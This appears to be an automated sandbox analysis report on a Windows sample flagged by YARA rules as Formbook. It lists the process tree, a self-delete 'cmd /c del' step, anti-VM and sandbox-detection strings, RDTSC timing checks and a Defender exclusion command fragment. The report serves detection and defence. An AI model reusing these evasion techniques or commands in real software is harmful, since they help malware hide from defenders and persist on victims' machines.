          Source: lTAPQJikGw.exe, 00000002.00000000.656432676.0000000000A52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exe, 00000002.00000002.730181194.0000000001975000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeBinary or memory string: OriginalFilenameCryptoConfig.exeH vs lTAPQJikGw.exe
          Source: lTAPQJikGw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.lTAPQJikGw.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.lTAPQJikGw.exe.4349930.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.lTAPQJikGw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: lTAPQJikGw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@12/11
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
          Source: lTAPQJikGw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: lTAPQJikGw.exeVirustotal: Detection: 44%
          Source: lTAPQJikGw.exeReversingLabs: Detection: 43%
          Source: unknownProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exe
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Users\user\Desktop\lTAPQJikGw.exe C:\Users\user\Desktop\lTAPQJikGw.exeJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'Jump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: lTAPQJikGw.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: lTAPQJikGw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\xxwqcHkmba\src\obj\Debug\CryptoConfig.pdb source: lTAPQJikGw.exe
          Source: Binary string: control.pdb source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.729531949.00000000015CF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.917101037.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lTAPQJikGw.exe, control.exe
          Source: Binary string: control.pdbUGP source: lTAPQJikGw.exe, 00000002.00000002.730162331.0000000001970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.697776172.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 0_2_00EC5A3D push es; retf 0000h0_2_00EC5CE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B2A2 push cs; ret 2_2_0041B2A3
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3F2 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3FB push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B3A5 push eax; ret 2_2_0041B3F8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041B45C push eax; ret 2_2_0041B462
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415414 push esp; ret 2_2_00415416
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00414F46 push cs; ret 2_2_00414F47
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret 2_2_0041C1FF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00415FC5 push ebp; ret 2_2_00415FC6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00A55A3D push es; retf 0000h2_2_00A55CE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0152D0D1 push ecx; ret 2_2_0152D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04BDD0D1 push ecx; ret 7_2_04BDD0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B2A2 push cs; ret 7_2_0094B2A3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3A5 push eax; ret 7_2_0094B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3F2 push eax; ret 7_2_0094B3F8
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B3FB push eax; ret 7_2_0094B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945414 push esp; ret 7_2_00945416
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094B45C push eax; ret 7_2_0094B462
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00945FC5 push ebp; ret 7_2_00945FC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0094BF12 push dword ptr [8427D5C5h]; ret 7_2_0094C1FF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00944F46 push cs; ret 7_2_00944F47
          Source: initial sampleStatic PE information: section name: .text entropy: 7.73125493594
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: lTAPQJikGw.exe PID: 7056, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000009385E4 second address: 00000000009385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000093896E second address: 0000000000938974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7060Thread sleep time: -99171s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6088Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 6800Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 99171Jump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.676441692.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.697993865.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.676441692.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000000.677401262.000000000A9A0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA#
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.695466749.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000003.00000000.676552486.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000003.00000000.676624021.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: lTAPQJikGw.exe, 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000003.00000000.677443197.000000000A9E1000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000000.697628647.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_004088A0 rdtsc 2_2_004088A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_00409B10 LdrLoadDll,2_2_00409B10
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FB944 mov eax, dword ptr fs:[00000030h]2_2_014FB944
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FB944 mov eax, dword ptr fs:[00000030h]2_2_014FB944
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC962 mov eax, dword ptr fs:[00000030h]2_2_014DC962
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB171 mov eax, dword ptr fs:[00000030h]2_2_014DB171
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB171 mov eax, dword ptr fs:[00000030h]2_2_014DB171
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]2_2_014D9100
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]2_2_014D9100
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9100 mov eax, dword ptr fs:[00000030h]2_2_014D9100
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150513A mov eax, dword ptr fs:[00000030h]2_2_0150513A
